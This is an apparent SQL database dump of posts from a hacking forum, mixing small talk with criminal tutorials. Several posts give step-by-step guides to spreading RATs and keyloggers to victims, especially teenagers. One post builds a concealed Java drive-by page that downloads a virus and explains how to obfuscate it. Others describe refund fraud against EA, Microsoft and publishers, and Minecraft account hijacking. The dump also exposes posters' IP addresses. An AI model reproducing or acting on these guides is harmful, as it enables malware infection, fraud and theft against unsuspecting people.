'3550', '13', 'RE: [HACKED] http://content.hks.harvard.edu', '0', '205', 'mothered', '1349501541', 'Great work Indeed mate.\r\n\r\nLove It, good on you.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'fb2d21e500242a6bfb9614c86fb0224a', '0', '0'); INSERT INTO mybb_posts VALUES('3593', '702', '0', '35', 'You guys like my new userbar?', '0', '222', 'Exposé', '1349502157', 'I\'m going to make this group for l33thacking. Tell me if you guys like this userbar. I might make the dudes eyes blink too :D\r\n\r\n[img]http://i.imgur.com/Wlg3d.gif[/img]', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a2005dff77ed8fbc6d7b043d5b12f0c7', '0', '0'); INSERT INTO mybb_posts VALUES('3594', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349503826', 'Thanks lol....:D. Glad to be here', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'd9c74387c1b00df59eaa9199cf80d3c7', '0', '0'); INSERT INTO mybb_posts VALUES('3595', '680', '3457', '35', 'RE: Some of my works...', '0', '82', 'iTzIpod', '1349523158', 'Image 3 is broken .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ab6115db422b33b42336739b31272fb0', '0', '0'); INSERT INTO mybb_posts VALUES('3596', '567', '2811', '16', 'RE: How to SE McDonalds', '0', '82', 'iTzIpod', '1349523198', 'No problem :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5da76ab5889f6302c5fd2e79f0bdaf4', '0', '0'); INSERT INTO mybb_posts VALUES('3597', '698', '3557', '7', 'RE: Skype group anyone?', '0', '82', 'iTzIpod', '1349523510', 'I am.\n\nSkype: iTzIpod\n\nI\'ll be on daily.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7dbb3811747eaca21a64f95b5a8ccde6', '0', '0'); INSERT INTO mybb_posts VALUES('3598', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1349523567', 'How\'d you know I was a Mod.. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43e77b5baf24aecd5c4a693ea34aa223', '0', '0'); INSERT INTO mybb_posts VALUES('3599', '446', '2058', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1349523643', 'Can we use traffic bots on LH?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2493d16dbdc5be6ff3664c2b9fd16fa3', '0', '0'); INSERT INTO mybb_posts VALUES('3600', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '82', 'iTzIpod', '1349523675', 'I own 3 Minecraft accounts. 1 is my friend\'s (We share it)\n\nAnd the other 2 are mine.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '544c9e834f4ea54a1e3bb2add5ad92b5', '0', '0'); INSERT INTO mybb_posts VALUES('3601', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349523745', 'That icon. I dig. ;) \n\n\nWhat is it supposed to be? Rather use an Angry Bird or something :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'af64ff2f784f539dbf3b3a9fc2dbd19f', '0', '0'); INSERT INTO mybb_posts VALUES('3602', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '82', 'iTzIpod', '1349523779', 'I drink water. :* Gotta love that shit.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6971de7a7cd2424fdfbd846f05a09081', '0', '0'); INSERT INTO mybb_posts VALUES('3603', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '82', 'iTzIpod', '1349523818', 'What kind of icon is that? :o Never seen it before.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0ba402fa54277d9c169cf3320b648175', '0', '0'); INSERT INTO mybb_posts VALUES('3604', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349523850', 'http://www.youtube.com/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '460f1c7fdcc064604e29b58eaf7880a8', '0', '0'); INSERT INTO mybb_posts VALUES('3605', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '62', 'R?????zo?', '1349524346', 'only water here too.\ngotta keep my body in shape without sodas and alchool :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '42382641e62df57875ff6c35e43e017f', '0', '0'); INSERT INTO mybb_posts VALUES('3606', '703', '0', '61', '[Request] Spreading eBook', '0', '100', '??zg???g????61', '1349525172', 'Hey guys, I was wondering if anyone had a way of quickly spreading. Thanks :)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '22be48e7a430f8f39cbfdfe5d66d6ee9', '0', '0'); INSERT INTO mybb_posts VALUES('3607', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '100', '??zg???g????61', '1349525307', 'Nice, I like the icon ;DDDDD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '7398790230b7188dd63968353c0ffbf7', '0', '0'); INSERT INTO mybb_posts VALUES('3608', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '100', '??zg???g????61', '1349525843', 'Cool xD never actually done this before but I\'ve heard of it.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2d552943b5d21313c3d9c95a27d95bbc', '0', '0'); INSERT INTO mybb_posts VALUES('3609', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '205', 'mothered', '1349527616', 'Very nice Indeed mate. Will certainly give this a shot.\r\n\r\nThanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4deedb602b8c7a03b9315c4e97caac58', '0', '0'); INSERT INTO mybb_posts VALUES('3610', '123', '305', '14', 'RE: Top 10 free VPNs', '0', '205', 'mothered', '1349527836', 'I\'ve personally tried Hotspot Shield, TOR, and CyberGhost, and they certainly serve their purpose.\r\n\r\nNice thread mate, well put together.\r\nAppreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '83db39de8fff1d597902aed1b68da975', '0', '0'); INSERT INTO mybb_posts VALUES('3611', '488', '2355', '8', 'RE: What are you listening to?', '0', '199', 'Anonymous™', '1349529558', 'The Script - Hall of Fame ft. will.i.am', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '0609760cfed8ddaa8a452b24c02b4a56', '0', '0'); INSERT INTO mybb_posts VALUES('3612', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349529589', 'The Script - Hall of Fame ft. will.i.am', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '859d0036ee0f46053666d782a17a0748', '0', '0'); INSERT INTO mybb_posts VALUES('3613', '684', '3498', '19', 'RE: Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '199', 'Anonymous™', '1349529644', 'Thanks for sharing this with us i needed this.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'c3410b44107e5960dfe72e5779ec869a', '0', '0'); INSERT INTO mybb_posts VALUES('3614', '488', '2355', '8', 'RE: What are you listening to?', '0', '82', 'iTzIpod', '1349533862', 'Listening to my keyboard making those \"typing noises\"', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37700ec8437d219b9cf8f318dea032a2', '0', '0'); INSERT INTO mybb_posts VALUES('3615', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349533900', 'http://www.youtube.com/watch?v=t3yyJkIUErY', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c157dd1c6f91e951ae071b00bb2d8b98', '0', '0'); INSERT INTO mybb_posts VALUES('3616', '704', '0', '66', 'Minecraft Accounts', '0', '82', 'iTzIpod', '1349533993', 'I have a couple and I will give them out to members.\r\n\r\n\r\n\r\n\r\nPost & PM Me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '057b4475f296a1de9f82f642d462a346', '0', '0'); INSERT INTO mybb_posts VALUES('3617', '705', '0', '61', 'Minecraft Accounts', '0', '82', 'iTzIpod', '1349534141', 'Hey guys.\r\nI\'m giving away Free Minecraft Accounts.\r\n\r\n\r\nJust post here and PM me.\r\n\r\nLike what I\'m doing?\r\n\r\nYou can support me by donating money to my Paypal.\r\n\r\nPlease use the Gift method. And send it to this email\r\n\r\nSoaR_iPod@aol.com', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9885e99b36746a59d82dbb8892bb3949', '0', '0'); INSERT INTO mybb_posts VALUES('3618', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1349537447', 'http://www.picsend.net/images/533426humpse.gif', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '72ca16d6fbcfeac05a414857ad82256a', '0', '0'); INSERT INTO mybb_posts VALUES('3619', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '222', 'Exposé', '1349537852', 'Haha idk just found it and was like dam, that\'s one fearless guy hahaha', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '185bf6a2bcf46cb181e5007cb6581653', '0', '0'); INSERT INTO mybb_posts VALUES('3620', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '222', 'Exposé', '1349537887', 'Water is good after I play soccer or basketball, other than that it\'s Snapple :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '04f373ef2895ea848839b18e876cf9fe', '0', '0'); INSERT INTO mybb_posts VALUES('3621', '698', '3557', '7', 'RE: Skype group anyone?', '0', '222', 'Exposé', '1349537947', 'Ok added you dude. Hopefully we can get a couple more people :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6d2b5f05fcdd3e89600e0a0afda8cb34', '0', '0'); INSERT INTO mybb_posts VALUES('3622', '629', '3047', '21', 'RE: [FREE] Giving Away DrDos Script [FREE]', '0', '160', 'Jacob', '1349538006', 'Can I please get it? Thanks :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '901f131db74afea58e52e6b8031472e1', '0', '0'); INSERT INTO mybb_posts VALUES('3623', '680', '3457', '35', 'RE: Some of my works...', '0', '222', 'Exposé', '1349538017', 'Yeh it\'s probably due to the hosting....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c308f0a8fcd3b679c991bf3490686f6d', '0', '0'); INSERT INTO mybb_posts VALUES('3624', '488', '2355', '8', 'RE: What are you listening to?', '0', '222', 'Exposé', '1349538068', 'I mostly listen to Pandora when I\'m bored or something like that :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '64334b02cafc3c21bf026cca676ae5e2', '0', '0'); INSERT INTO mybb_posts VALUES('3625', '43', '105', '7', 'RE: How did you find us?', '0', '222', 'Exposé', '1349538179', 'Because I posted something and you closed one of my threads. Naturally that would not be right lol. So I checked ur profile and u have the mod userbar :P....gotcha :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b4963ea4cf44e6484e312dfe1f121682', '0', '0'); INSERT INTO mybb_posts VALUES('3626', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1349538450', 'Idk I think it\'s supposed to be some warrior guy or something. And it was rounded so it would be great for the left side :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6911b19b01ad26400c41de3c7b18d8bf', '0', '0'); INSERT INTO mybb_posts VALUES('3627', '197', '696', '56', 'RE: /me Thread', '0', '222', 'Exposé', '1349538588', '/me is a boss at social engineering!!!!', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a546bb3b7a84c17589ee3298c9d3d075', '0', '0'); INSERT INTO mybb_posts VALUES('3628', '238', '1021', '56', 'RE: Ban the user above you', '0', '222', 'Exposé', '1349538638', 'Banned because you used banned and pissed in the same sentence.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c58ab78c62444995944ed8eb42232402', '0', '0'); INSERT INTO mybb_posts VALUES('3629', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '222', 'Exposé', '1349538676', 'Awww yea mutha truckaaaaasssss', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'afca1cc17723640cdb9d3b8501e6eff7', '0', '0'); INSERT INTO mybb_posts VALUES('3630', '691', '3517', '3', 'RE: Gaming Section Released', '0', '222', 'Exposé', '1349538782', 'Who play\'s MW3 anymore....pfffft. Battlefield 3 is the way to go :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'd04e1164b16fbc5007646240361d0a0f', '0', '0'); INSERT INTO mybb_posts VALUES('3633', '706', '0', '4', 'Supppp', '0', '214', 'Rave™', '1349541493', 'Yo my name is Kasual.\r\nI\'m 14.\r\nI Specialize in RATTing and spreading, and SE\'ing.\r\nI\'m also decent at SE\'ing\r\nI\'ve SE\'d:\r\n5 Otterbox\'s\r\nPS Vita\r\nBeats by Dre\r\nMonster 24 Pack\r\nDr Pepper 24 pack\r\nGogo Inflight Wifi\r\nAmerican Eagle\r\nME Electronics\r\nGamcom 780 Headset\r\niPhone 4S\r\nGriffin Case for my iPhone 4S\r\nBattery Case for my iPhone\r\nPorn Accounts\r\nand lots more.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'c0ec84f7be94949c32bb51c34b341a23', '0', '0'); INSERT INTO mybb_posts VALUES('3634', '707', '0', '13', 'How to migrate CRACKED minecraft accounts!', '0', '214', 'Rave™', '1349541573', '[align=center][size=large] [color=#FF6347] Not Sure If This Is In The Right Section![/color][/size]\r\n\r\n1)Make sure your account is migratable.(login on minecraft.net with the username of the account you want to migrate)\r\n\r\n2)Login into the migratable account and go to Profile. Click on the link they provided to migrate your cracked account.\r\n\r\n3)Once at the page, login with your cracked minecraft username and password. They will ask you whether to create a new account with the provided email or a new one. Use the provided email.\r\n\r\n4)Continue with the registration until the security questions. Remember the answers to these questions as you will need these later.\r\n\r\n5)Go to My Account(top right)>Settings. Click \'Edit\' beside the email. Notice the \"If you no longer have access to the e-mail address tied to your you can request to change it by passing a security challenge. \" Click the hyperlink \'request to change it\'\r\n\r\n6)Insert your email address you want to migrate the account to and click \'Request Email Change\' Now check your email you gave to Mojang and click on that link. They will ask for the security question answers. You created them just now, so place your answers inside there and tada! Done. Remember to change the password and everything, since you have total control of the account Also say thanks! [/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'c3c001e767f4d4dbbe8ab99b561d53a4', '0', '0'); INSERT INTO mybb_posts VALUES('3635', '708', '0', '16', 'EA Games', '0', '214', 'Rave™', '1349541618', 'Free EA Game Pass eBook By: Kasual\r\n1. Download Amazon Receipt Creator\r\n2. Generate an Identity\r\n3. Open Amazon Receipt Creator\r\n4. Fill In The Following\r\na. Order Placed At least 5 Days Ago\r\nb. Item Name <Game Name>\r\nc. Item Price <Game Price>\r\nd. Address Information Your Fake Identity\r\n5. Click “Generate”\r\n6. Open the generated HTML file\r\n7. Take a screenshot like THIS\r\n8. Create an EA account\r\n9. Visit EA Support\r\na. Product <Game Name>\r\nb. Category Technical Support\r\nc. Platform <Your Platform>\r\nExample Chat\r\n[spoiler]\r\nEA: Thanks for choosing EA, how can I help you? You: I bought <Game Name> from amazon and the code was invalid. I called Amazon and now they\'re telling me to contact EA, so I am here. EA: Alright. EA: I regret for the inconvenience you experienced. EA: You need not worry, I\'ll do my best to address your issue. EA: Can I have your first & last name, and code of the game please ? You: <First & Last>, and give me a second to get the code You: <Few Seconds Later> <Enter Code Here> You: Also, I can give you the receipt from amazon if necessary You: (It\'s for Xbox 360) EA: Ralph, thanks for providing me the requested information. EA: Yes, great! EA: Please upload the image of receipt at this link:- http://www.kn3.net EA: That\'s the one from email. EA: Is this a receipt ? EA: Yes, from amazon. EA: A hard copy or soft copy ? EA: It\'s a soft copy, it\'s from email. I only use these for filing with amazon. Do you require something else? EA: Okay. EA: Please provide me your gamer tag. You: <Gamertag> EA: Let me go ahead and pull-out a new code. Here we go- EA: Here is the new code:- <code> You: I\'ll redeem on Xbox.com real fast, hopefully this one works You: Yes! It works, finally! You were very helpful, if there is a survey after this you\'ll get 5 stars!\r\n[/spoiler]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '1192dd2829d0238b986139dc058b5b7b', '0', '0'); INSERT INTO mybb_posts VALUES('3636', '709', '0', '16', 'SE Microsoft', '0', '214', 'Rave™', '1349541657', '[align=center] everyone, this is an easy little tutorial for your first (or if you\'re bored) free item. It\'s hassle free, you don\'t need a receipt\r\n\r\n1. Open up skype and call this number - 8009365700\r\n2. Say Tech support\r\n3. Say \"____\" - Insert whatever product you want to SE here.\r\n4. Someone will ask you for your name + number. Tell them your real name (If you want) but make up the number (I always do, they don\'t care)\r\n5. They will ask about the product. Tell them that it was a gift from a friend, but it does not work.\r\nFor me, I wanted a Microsoft Lifecam Cinema HD. I told them that the device did not show up after plugging it in in numerous computers. They may or may not ask some other troubleshooting questions. If they do, just work around it to make sure that they know it does not work.\r\n6. S/he will give you a caseID number. Keep a hold of it as she will put you through to another directory.\r\n7. Tell the new person your name + CaseID number.\r\n8. They may ask about the product not working. See step 5.\r\n9. Now they should say that they will replace it. Give them your email address if you haven\'t already and wait for an email from them.\r\n10. Reply to the email. It should be your information that they need. Make sure it is REAL.\r\n\r\nEnjoy your free microsoft product. Try not to do this too many times in one sitting as people have been known to get caught. \r\n\r\nNote: In the case they DO ask you to give them a picture of a receipt or the product. You can either A. Hang up and try again later on. Or B. Forge up a quick receipt. For more info about this, look in the VIP section for information about receipts.\r\n\r\nPlan A is usually best though..\r\n\r\nHope you found this guide informative. It\'s fairly common to some but I wrote it up for the guppies such as myself. Have fun SE\'ing! [/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'bc261935c825164bc1980ef47cca251b', '0', '0'); INSERT INTO mybb_posts VALUES('3637', '710', '0', '12', 'Ultimate Spreading Guide', '0', '214', 'Rave™', '1349541907', '[align=center] [color=#FF6347] I saw a lot of people asking for help with spreading their Keylogger or their RAT.\r\nNow i decided to make a huge tutorial on spreading to help the community.\r\nI will start with very basic and famous stuff like youtube and also a few advanced methods.\r\n\r\nNOTE: before doing all of this,you must make sure that your server is already FUD.\r\n\r\nGeneral Things you need:\r\n\r\na RAT (ready set-up, make sure its working)\r\na crypter (you will get a lot more victims if your server is FUD)\r\na filehost (for example fileave or dropbox)\r\na computer\r\na brain would not be bad \r\n\r\nMethods:\r\n[spoiler]\r\n1). Youtube\r\n\r\nIn my opinion the most famous and easiest method.\r\nIt is great if you want to target a special group like people with special accounts, for example steam.\r\n\r\n1. Go to youtube.com and register a account if not allready done.\r\n2. In my example i will target people with steam accounts, so i look for some videos with the title \"Steam Hack\" or \"Black Ops Hack/Keygen\" or something like that. You also can look for a pay palhack video, you will find something you like.\r\n3. When you found a good video, go to keephd.com and download the video in your preferred quality.\r\n4. Then go back to youtube and upload the downloaded video.\r\n5. While uploading, think about an attractiv title for the video, for example \"Black Ops Keygen 100% Working !!!\". In the description put a small text, for example a readme and your server.exe download link.\r\n6. When its uploaded your done.\r\n\r\nTips:\r\n-At the beginning your views and downloads will only increase slowly but they raise fast and you get a good amount of downloads.\r\n- It can help to use a youtube bot to increase views, thumps up etc. to make your video more legit looking, or ask a few friends you haveBiggrin\r\n[/spoiler]\r\n[spoiler]\r\n\r\n2). Forums\r\n\r\nFirst of all i don\'t mean SPAM! I dont want anybody posting malware here!\r\n\r\nIn my opinion its another simple method.\r\nThere are a lot of big and active forum to post some malware.\r\nThe best choice are forums with a lot of young members because they download everything they can get and that sounds cool and interesting (i am talking from my own experienceBiggrin).\r\n\r\n1. Look for a big forum on google. It will come up a lot of them, i would take one from the first google page. Easiest Forums to spread are gaming/cheating forums because most of them are kids or teenager.\r\n2. Create a new account there with a cool username ( it should look trusting, not \"l33t-haxxor\" or \"i hack you\" ).\r\n3. Design your profile with avatar, signature, some fake details like you want.\r\n4. Make some HQ threads to catch the members attention and make you looking more trusted.\r\n5. After a time make a new thread about a new simple UD wallhack or a working keygen you coded in the last time. Make the thread attractiv and detailed to catch the readers eye. You should add a detailed feature list, screenshots and maybe a short video.\r\n6.You are done. Wait for the first kids downloading your file.\r\n\r\nTips:\r\n- Make multiple accounts to answer to your thread and vouch for you. These account should also look legit to the others, so not 1 time posters or joined 1 minute before.\r\n[/spoiler]\r\n[spoiler]\r\n3). Torrents\r\n\r\nAnother Easy method that will get some easy Bots for you.\r\n\r\n1. Download a torrent program like BitTorrent here: \"Guests cannot see links in the messages. Please register to forum by clicking HERE to the see links.\"\r\n2. Install BitTorrent if not allready done\r\n3. Go to file -> Create new Torrent\r\n4. Look for your file and select it. Now a new torrent with your file will be created.\r\n5. Go to a famous torrent site like Piratebay.org\r\n6. Upload your new torrent to the site with a detailed description. As title choose something like a pay pal hack or a BF3 Beta keygen, something that will attract many people.\r\n[/spoiler]\r\n[spoiler]\r\n4). Omegle\r\n\r\nThis is more complicated because you dont get that many downloads, you have to work for each one.\r\nThere are diffrent omegle methods, you only can post your server link to each of them and say its a photo package, but thats not working good.\r\nI give you a better method. I think many will know it:\r\n\r\n1. Download the program ManyCam which allows you to use a virtual webcam.\r\n2. Install Manycam\r\n3. Download this video pack of a girl. It can wave and do some other things. Download: \"Guests cannot see links in the messages. Please register to forum by clicking HERE to the see links.\"\r\n(this is not my video package, but i used it a few times. Thanks to whoever posted thisBiggrin)\r\n4. Start omegle, ss soon as you get into a conversation with somebody go to your many cam and start the \'Wave\' clip.. So it waves at the person and looks very legit.\r\n5. Start a conversationen about some normal things with him/her.\r\n6. After that ask if he/she wants to see some pictures.\r\n7. Sent him your server.exe or your JavaDriveBy and your done if he opened it.\r\n\r\nTips:\r\n- If you fail, you can retry as often as you want\r\n- You should replace the server.exe icon with a jpg icon and may hide the file ending to make it more legit.\r\n[/spoiler]\r\n[spoiler]\r\n5). JavaDriveBy\r\n\r\nJavaDriveBys are great. You put them on a site and everyone who visits this site download a hidden file and executes it. If your server is FUD, Most people will not notice something is wrong.\r\nI will present you a very simple java drive by, you can search the forums to find more advanced ones.\r\n\r\n1. Go to dot.tk\r\n2. In the URL field enter your direct server link.\r\n3. After loading the url, you can change the name of the url to something good looking, for example \"pay pal-hack.tk\" or \"naughty-nude-girls.tk\".\r\n4. After getting this link you can spread it everywhere you want.\r\n\r\nTips:\r\n-You can spread this with the help of other methods in this tutorial. Say you made a cool new website with a lot of hacking tools and software or you want to show your new website and the people will click on it because they are interested on your site.\r\n[/spoiler]\r\n[spoiler]\r\n6). PTC Sites\r\n\r\nPTC sites are sites that pay you for visiting links or sites for a short time.\r\nFor this method we will use a JavaDriveBy that we will advertise on a PTC site for a low amount of money. You will get 2000 views on your link for only $1\r\n\r\n1. First of all make your JavaDriveBy ready to work.\r\n2. Then look for a big PTC company. Many of them are scam, but there are a few ones that are ok. I take the site paidtoclick.in\r\n3. Make a new account there and make it ready to work.\r\n4. Click on the advertise button\r\n5. Click on the \"Buy Now\" Button besides the \"Link ad Hits\". Try with $1\r\n6. Create a new link with a title you want, for example money making software or something like that.\r\n7. Put your JavaDriveBy into the target URl field. Leave the rest blank.\r\n8. Then pay for it and wait for the victims Biggrin\r\n\r\nTips:\r\n-The more money you invest the more victims you get.\r\n-Try to do it on diffrent PTC sites that are activ.\r\n[/spoiler]\r\n[spoiler]\r\n7). Auto Spreader\r\n\r\nAuto Spreaders or worms are a helpful thing in spreading.\r\nYou put your file on a little server and it spreads itself from every slave to other people.\r\nMany worms use facebook, msn, 4chan and other communities or chat programs to spread itself.\r\nYou can spread your worm with the help of the methods\r\nabove and you will multiple your victims\r\nand spreading work.\r\n[/spoiler]\r\nThanks for reading my Guide, please post a little feedback or give me some feedback on what to edit or make it better.\r\n\r\nDon\'t forget to say thanks!\r\nEnjoy!\r\n[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '63538cc19e3b8d4fa4f685e99a8e15c2', '0', '0'); INSERT INTO mybb_posts VALUES('3638', '711', '0', '16', '[EASY] SE Books', '0', '214', 'Rave™', '1349541964', '[align=center] [color=#1E90FF] How to get free books:\r\n\r\n1. Go on Amazon.com and find a book you want. Take note of the publisher and the ISBN number.\r\n\r\n2. Find the publisher\'s contact us info and send them an email. Include a simple excuse like the last few pages had ink smeared or a few pages were missing (I suually use the ink smearing).\r\n\r\n3. They usually ask for your address to send the replacement to and for you to discard of the original in an environmentally friendly manner.\r\n\r\nThat\'s really all there is to it. There are lots of publishers out there, so use that to your advantage. I\'ve got many books this way, including expensive textbooks I\'ve needed for school (although they often take a while to ship, so do it well in advance).[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'a78f52576338c69ed4cb56e13762b70f', '0', '0'); INSERT INTO mybb_posts VALUES('3639', '712', '0', '13', 'SQL Injection Ebook', '0', '214', 'Rave™', '1349542033', '[b] Hey guys. I have for you a SQL Inject eBook\r\n[/b]\r\n\r\n[color=#32CD32] [size=xx-large]Download:\r\n[url=http://www.mediafire.com/view/?4m8shdqdjb8whsr]I LOVE YOU KASUAL THANKS FOR BEING SO ACTIVE AND NO POST AND PM <33[/url] [/size][/color]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '27ed3ff9118c1633283ce74f4d22f3f0', '0', '0'); INSERT INTO mybb_posts VALUES('3640', '713', '0', '12', 'How To Make A FUD Java Drive-By', '0', '214', 'Rave™', '1349542067', '[size=xx-large][align=center][color=#32CD32] How To Make A FUD Java Drive-By By Kasual[/color][/align][/size][b]Step 1[/b]\r\nDownload these files:\r\n[url=http://uppit.com/dko09gqkar8x/fudjava.rar]http://uppit.com/dko09gqkar8x/fudjava.rar[/url]\r\n\r\nVirus Scan: \r\nhttps://www.virustotal.com/file-scan/rep...1323713087\r\n\r\n[b]Step 2[/b]\r\n\r\ngo to http://www.000webhost.com and register an account, unless you have a paid domain/webhost or have a different free hosted one.\r\n\r\n[b]Step 3[/b]\r\n\r\nExtract the files you had downloaded earlier in Step 1 to a folder somewhere on your computer that you\'ve the knowledge to navigate yourself to.\r\n\r\n[img]http://i283.photobucket.com/albums/kk291/Demiflame2/fud.png[/img]\r\n\r\nGo into the folder you\'ve just extracted the files to, and right-click the game.html file and edit with notepad, notepad++ or whatever you have and prefer to edit documents with as seen below.\r\n\r\n[img]http://i283.photobucket.com/albums/kk291/Demiflame2/fue-1.png[/img]\r\n\r\nYou should see the following\r\n\r\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\r\n<html>\r\n<head>\r\n<title>YourSiteOrServerNameHere - Webclient</title>\r\n</head>\r\n\r\n<body bgcolor=\"grey\">\r\n<center>\r\n<APPLET CODE = \"Client.class\" ARCHIVE = \"Client.jar\" WIDTH = \"0\" HEIGHT = \"0\">\r\n<PARAM NAME = \"AMLMAFOIEA\" VALUE = \"YourVirusUrlGoesHere\">\r\n</APPLET>\r\n</center>\r\n</body>\r\n</html>\r\n\r\n\r\nThe above code is basically self-explanatory.\r\nReplace what is inbetween the \'title\' tags with your webpage\'s name.\r\nReplace the YourVirusUrlGoesHere with your virus Url.\r\n\r\n[b]Step 4[/b]\r\nCreate a new directory as to where you would like the page that has the drive-by in it to be located at.\r\n\r\nFor example, if you\'d like it to be located at\r\n\r\nhttp://www.yoursitenamehere.com/game.html\r\n\r\nThen all you need to do is go into your public_html directory and place the files in there, not in a sub-directory.\r\n\r\nSo just select the jar file and the html file and drag & drop them into your public_html directory like shown below.\r\n [img]http://i283.photobucket.com/albums/kk291/Demiflame2/fuf-2.png[/img]\r\n[img]http://i283.photobucket.com/albums/kk291/Demiflame2/fug-1.png[/img]\r\n\r\nIf you accept the Java Applet by clicking \'Run\' then your virus will auto download.\r\n\r\nI suggest using a crypter, because if not then it\'s not the hardest thing to detect for those out there with some common sense, although the past few days of RATting I see that many out there have none.\r\n\r\nI strongly suggest encrypting your html, if not then people can right-click your page and view the source, and see that it\'s downloading an .exe file to their computer.\r\n\r\nTo encrypt your Html, just go here\r\nhttp://www.iwebtool.com/html_encrypter\r\ncopy and paste the html within your .html document(game.html unless you\'re using your own .html document) in the box and then click the \'Encrypt!\' button.\r\n\r\nThe outcome will look be in a JavaScript code, but you can just paste it into your html document without the <html> and <body> tags etc. for the page, as the encrypted copy already has it embedded within it.\r\n\r\nI\'m going to give a bit of advice, although encrypting your Html helps better hide the visibility of the virus to the people you\'re trying to infect, I strongly recommend copying the encrypted Html and pasting it in the box, clicking the \'Encrypt!\' button and repeating the process anywhere from 3-20 times to make it harder for people to decrypt.\r\n\r\nI suggest that you either remove the\r\n\r\n<!-- HTML Encryption provided by iWEBTOOL.com -->\r\n\r\nor at least edit it to say something like\r\n\r\n<!-- HTML Encryption by YourSiteNameHere due to copyright issues -->\r\n\r\nor something else that you feel people will believe quite easily incase they try to view your page\'s source to check if it\'s safe before accepting the drive-by.\r\n\r\nThat, is how you embed and infect people using a FUD Java Drive-by.\r\n\r\nHope this helped many of you all.\r\n\r\nI made this tutorial over the day on the side because I noticed a fair bit of people were wondering how to do this and not get a virus from downloading the proper files required for this.\r\n\r\nThanks enjoy!', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'fcd97e33a783c46add032c30827dcb31', '0', '0'); INSERT INTO mybb_posts VALUES('3641', '714', '0', '3', 'Spam Bot Bug', '0', '214', 'Rave™', '1349542427', '[b] Hey Joker man, I was trying to post my thread, and it kept saying the work \"card\" was spam. I used the control f and searched for c a r d, no c a r d in my thread. Lol so I ended up not posting it :P [/b]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'e829d22904a2ddd64749cc4b53258706', '0', '0'); INSERT INTO mybb_posts VALUES('3642', '715', '0', '23', 'Free HostGator Hosting! [N00B Friendly]', '0', '214', 'Rave™', '1349542488', '[b] [color=#FF4500] Alright. Go to Hostgator. \r\n[/color][color=#32CD32] Next create a account[/color][color=#FFD700]\r\nNow, enter coupon code\r\n\r\n[size=xx-large] Coupon Code : FREEHOSTGATOR123\r\n\r\nGET IT 